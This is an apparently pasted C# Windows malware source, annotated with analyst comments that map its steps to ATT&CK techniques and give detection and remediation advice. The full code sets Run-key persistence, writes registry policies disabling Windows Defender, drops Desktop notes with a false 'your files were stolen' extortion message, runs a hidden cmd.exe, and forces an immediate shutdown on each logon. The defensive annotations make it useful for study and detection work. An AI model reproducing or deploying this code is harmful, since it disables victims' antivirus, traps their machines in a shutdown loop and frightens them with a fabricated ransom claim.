DustinHailie

Malwarea

Apr 20th, 2019
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Runtime.InteropServices;
  5. using System.Text;
  6. using System.Threading.Tasks;
  7. using System.Threading;
  8. using System.Windows.Forms;
  9. using Microsoft.Win32;
  10. using System.Diagnostics;
  11. using System.Security.Principal;
  12. using System.IO;
  13.  
  14. namespace Microsoft_Network_Brooker
  15. {
  16.     class Program
  17.     {
  18.         [DllImport("kernel32.dll")]
              // Analyst note: this P/Invoke pair is used by Main to hide the process's own console
              // window (ATT&CK T1564.003, Hidden Window). Every Console.WriteLine in this file
              // therefore writes to a window the user cannot see.
  19.         static extern IntPtr GetConsoleWindow();
  20.  
  21.         [DllImport("user32.dll")]
  22.  
  23.         static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
              // Name of the running process. CopyToStartup and IsStartupItem use it as the Run-key
              // VALUE NAME, so the persistence entry is named after whatever the executable is called.
  24.         public static string ApplacationName = Process.GetCurrentProcess().ProcessName;
              // RWFileNames and WRFileNames are declared but never read or written in this listing.
  25.         static string RWFileNames;
  26.         static string WRFileNames;
              // Current user's Desktop folder: the drop location for the note files.
  27.        static string path = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
              // Logged-on user name; only interpolated into the note text.
  28.         static string Username = Environment.UserName;
              // System.Random is used only for file-name suffixes and for the number printed as
              // "SSASH Key". No cryptographic key is generated anywhere in this listing.
  29.         static Random rnd = new Random();
  30.         static void Main(string[] args)
  31.         {
                  // Analyst note: entry point. Visible execution order:
                  //   1. hide the console window             (T1564.003)
                  //   2. CopyToStartup: HKCU Run-key value   (T1547.001 persistence)
                  //   3. Disable_windowsDefender: HKLM policy values (T1562.001 impair defenses)
                  //   4. CreateFilesAndDestroy: note files on the Desktop
                  //   5. CMDcommands: hidden cmd.exe child
                  //   6. shutdown: immediate power-off       (T1529)
                  // Persistence is written BEFORE the shutdown, so the chain is set to repeat at the
                  // next logon of the same user. Recovery has to remove the Run value first.
                  // Main has no exception handling of its own and `args` is unused; confirm actual
                  // behaviour on a given OS build in an isolated sandbox only.
  32.             const int SW_HIDE = 0;
  33.             const int SW_SHOW = 5;
  34.             var handle = GetConsoleWindow();
  35.            ;
  36.            ;
  37.               ShowWindow(handle, SW_HIDE); // To hide
  38.               CopyToStartup();
  39.                Disable_windowsDefender();
  40.             CreateFilesAndDestroy();
  41.             /*
  42.              *
  43.                 This part will destroy the computer
  44.              */
                  // Analyst note: the author's comment above overstates what the next call does; see
                  // the note in CMDcommands. SW_SHOW is declared but never used.
  45.              CMDcommands();
  46.               shutdown();
  47.  
  48.         }
  49.         static void Disable_windowsDefender()
  50.         {
                  // Analyst note: defense-impairment step (ATT&CK T1562.001). It writes four DWORD
                  // policy values, each set to 1, under
                  // HKLM\SOFTWARE\Policies\Microsoft\Windows Defender:
                  //   DisableAntiSpyware
                  //   Real-Time Protection\DisableBehaviorMonitoring
                  //   Real-Time Protection\DisableOnAccessProtection
                  //   Real-Time Protection\DisableScanOnRealtimeEnable
                  // Writing under HKLM normally needs administrative rights. Without them the call
                  // throws, and the handler below only prints the message to the hidden console.
                  // Detection: alert on value-set events for these keys (e.g. Sysmon Event ID 13) from
                  // any process that is not Group Policy or management tooling, and watch the Defender
                  // operational log for configuration-change events.
                  // Mitigation: keep Tamper Protection enabled, which is designed to block or ignore
                  // this kind of policy tampering, and do not run daily-use accounts as administrator.
                  // Remediation: delete the four values (or restore policy) and confirm Defender's
                  // real-time protection state afterwards.
  51.             Console.WriteLine("Attempting to disable windows defender...");
  52.             try
  53.             {
  54.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableAntiSpyware", "00000001", RegistryValueKind.DWord);
  55.             }
  56.             catch (Exception Error)
  57.             {
  58.                 Console.WriteLine("Error| Error message: " + Error.Message);
  59.             }
  60.  
  61.  
                  // 20 ms pause between the two registry write groups.
  62.             Thread.Sleep(20);// i have to give it some time or else it wont let me and can throw errors
                  // Analyst note: despite "temparaly" in the message, nothing in this file removes the
                  // values again. They persist until an administrator or policy refresh clears them.
  63.             Console.WriteLine("Attempting to disable other antivirus settings temparaly");// disable realtime protection etc
  64.             try
  65.             {
  66.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableBehaviorMonitoring", "00000001", RegistryValueKind.DWord);
  67.  
  68.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableOnAccessProtection", "00000001", RegistryValueKind.DWord);
  69.  
  70.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableScanOnRealtimeEnable", "00000001", RegistryValueKind.DWord);
  71.             }
  72.             catch (Exception Error1)
  73.             {
  74.                 Console.WriteLine("ERROR | Error message: " + Error1.Message);
  75.  
  76.             }
  77.         }
  78.         static void CMDcommands()// will open a cmd silently and will try and delete system32 folder... LOL
  79.         {
                  // Analyst note: starts a windowless cmd.exe child with redirected stdin/stdout and
                  // feeds it one line. For impact assessment: the only command sent in this listing is
                  // `cacls C:\Windows\System32` with no further switches. That invocation reports
                  // ACLs, so the author's "delete system32" comment is not borne out by the visible
                  // code.
                  // Detection: process-creation telemetry (e.g. Sysmon Event ID 1 or Security 4688
                  // with command-line auditing) showing cmd.exe spawned without a window by an
                  // unsigned binary in a user profile, followed by a cacls.exe child.
                  // The bare catch below swallows every failure, and the command output is written
                  // only to the hidden console.
  80.             try
  81.             {
  82.                 Process cmd = new Process();
  83.                 cmd.StartInfo.FileName = "cmd.exe";
  84.                 cmd.StartInfo.RedirectStandardInput = true;
  85.                 cmd.StartInfo.RedirectStandardOutput = true;
  86.                 cmd.StartInfo.CreateNoWindow = true;
  87.                 cmd.StartInfo.UseShellExecute = false;
  88.                 cmd.Start();
  89.                 //-----------------//
  90.                 cmd.StandardInput.WriteLine(@"cacls C:\Windows\System32");///
  91.                 cmd.StandardInput.Flush();
  92.                 cmd.StandardInput.Close();
  93.                 cmd.WaitForExit();
  94.                 Console.WriteLine(cmd.StandardOutput.ReadToEnd());
                      // 8-second pause before control returns to Main, which then calls shutdown().
  95.                 Thread.Sleep(8000);
  96.             }
  97.             catch
  98.             {
  99.  
  100.             }
  101.         }
  102.         //-----------------//
  103.         static void CreateFilesAndDestroy()// im still working on this part  but it will destroy random system files and it creates files on the desktop with a spooky message
  104.         {
                   // Analyst note: two parts.
                   // (1) File.Delete is called with the Program Files DIRECTORY path. File.Delete is a
                   //     file API, so this call is not expected to remove any program data. Only
                   //     IOException is handled here.
                   // (2) A loop of up to 100 iterations writes text files to the user's Desktop.
                   // Triage facts from the visible code: there is no encryption, no file enumeration and
                   // no network or upload code. The note's claims (files "sent to a secure database",
                   // a key "hidden in memory") are a scare message, which the author's own comment
                   // below confirms. The "SSASH Key" is just a System.Random number.
                   // IoC: Desktop files named "YOUR COMPUTER WILL GET DESTROYED<4 digits>.txt".
                   // Detection: a burst of file-create events (e.g. Sysmon Event ID 11) in the Desktop
                   // folder from one process within about a second.
                   // Remediation: the files are inert text and can simply be deleted.
  105.             try
  106.             {
  107.                 System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
  108.             }
  109.             catch
  110.             (IOException ex)
  111.             {
  112.  
  113.             }
  114.             int i = 0;
  115.             while(i < 100)
  116.             {
  117.                 try
  118.                 {
  119.                     i++;
                           // The file-name suffix is a random number in 1000..9998, so two iterations
                           // can pick the same name and the total may be below 100 files.
  120.                     StreamWriter writer1 = new StreamWriter(path + @"\YOUR COMPUTER WILL GET DESTROYED" + rnd.Next(1000, 9999) + ".txt");
  121.                     writer1.WriteLine("Hello " + Username + " We have hijacked your computer and all your files have been sent to a secure database that only we have access too the key to access the server is hiddent somewhere in your memory and will fisapear in 24 hours or next computer restart" + "  SSASH Key: " + rnd.Next(10000,999999));
  122.                     //^^spooky message not really going to be uploaded to a database im not a loser
  123.  
  124.                     writer1.Close();
  125.                     Console.WriteLine("New File created!");
  126.                     Thread.Sleep(10);
  127.                     }
  128.                 catch
  129.                 (Exception ex)
  130.                 {
  131.  
  132.                 }
  133.                
  134.                
  135.             }
  136.            
  137.         }
  138.         static void shutdown() // this is at the end of the payload.. it will shutdown the computer, this is safe and can be done on any user level eg. user, admin etc
  139.         {
                   // Analyst note: launches `shutdown /s /t 0`, an immediate power-off with no grace
                   // period (ATT&CK T1529). "Safe" in the author's comments refers to the call working
                   // for unprivileged users, not to safety for the victim; unsaved work is lost.
                   // Combined with the HKCU Run value set by CopyToStartup, the expected effect is a
                   // shutdown shortly after each logon of the affected user.
                   // Recovery: sign in with a different account, or boot Safe Mode or offline media
                   // (Run-key entries are normally not processed in Safe Mode), then remove the Run
                   // value and the binary it points to.
                   // Detection: shutdown.exe created by a non-system parent (process-creation logs)
                   // and the matching shutdown-initiated record in the System event log.
  140.             try
  141.             {
  142.                 var psi = new ProcessStartInfo("shutdown", "/s /t 0");//starts the shutdown proccess
  143.                 psi.CreateNoWindow = true;
  144.                 psi.UseShellExecute = false;//this is what makes it safe it will
  145.                 Process.Start(psi);
  146.             }
                   // Any failure to start the process is silently ignored.
  147.             catch { }
  148.             }
  149.        static void CopyToStartup()
  150.         {
                   // Analyst note: despite the name, nothing is copied. This sets a value under
                   // HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, named after the process and
                   // pointing at the executable's current path (ATT&CK T1547.001). HKCU is per-user,
                   // so no elevation is needed and only the user who ran the sample is affected.
                   // IoC: a Run value whose name equals the sample's process name and whose data is a
                   // path in a user-writable location such as Downloads, Desktop or Temp.
                   // Detection: registry value-set events on the Run key (e.g. Sysmon Event ID 13), or
                   // an autostart inventory diff.
                   // Remediation: delete the value, then remove or quarantine the referenced file.
                   // Errors, including OpenSubKey returning null, are swallowed by the empty catch.
  151.             try
  152.             {
  153.                 RegistryKey registryKey = Registry.CurrentUser.OpenSubKey
  154.                 ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
  155.                 registryKey.SetValue(ApplacationName, Application.ExecutablePath);
  156.             }
  157.             catch(Exception)
  158.             {
  159.  
  160.             }
  161.         }
  162.         public bool IsStartupItem()
  163.         {
                   // Analyst note: this instance method is never called in this listing. Main is static
                   // and never constructs a Program, so it has no effect on the behaviour described for
                   // the other methods. It checks for the HKCU Run value named after the process. If the
                   // value is absent it calls CopyToStartup() to add it and returns false; if present it
                   // returns true. The key is opened writable and the result is not null-checked.
  164.             // The path to the key where Windows looks for startup applications
  165.             RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
  166.  
  167.             if (rkApp.GetValue(ApplacationName) == null)
  168.             {
  169.                 // The value doesn't exist, the application is not set to run at startup
  170.                 CopyToStartup();
  171.                 return false;
  172.  
  173.             }
  174.             else
  175.             {
  176.                 // The value exists, the application is set to run at startup
  177.                 return true;
  178.             }
  179.         }
  180.     }
  181. }